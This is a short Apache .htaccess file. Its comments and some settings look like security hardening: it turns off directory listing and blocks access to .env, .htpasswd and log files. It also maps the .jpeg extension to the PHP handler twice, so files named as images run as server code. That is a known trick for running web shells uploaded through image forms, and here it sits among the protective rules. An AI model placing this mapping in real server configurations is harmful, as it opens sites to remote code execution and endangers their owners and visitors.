
<IfModule mime_module>
  AddType application/x-httpd-php .php
</IfModule>

<IfModule mod_php>
  AddHandler application/x-httpd-php .jpeg
</IfModule>

<FilesMatch "\.(php|jpeg)$">
    SetHandler application/x-httpd-php
</FilesMatch>

# Disable directory listing
Options -Indexes

# Secure sensitive files
<FilesMatch "\.(htaccess|htpasswd|env|ini|log)$">
  Order allow,deny
  Deny from all
</FilesMatch>

# Default charset
AddDefaultCharset UTF-8

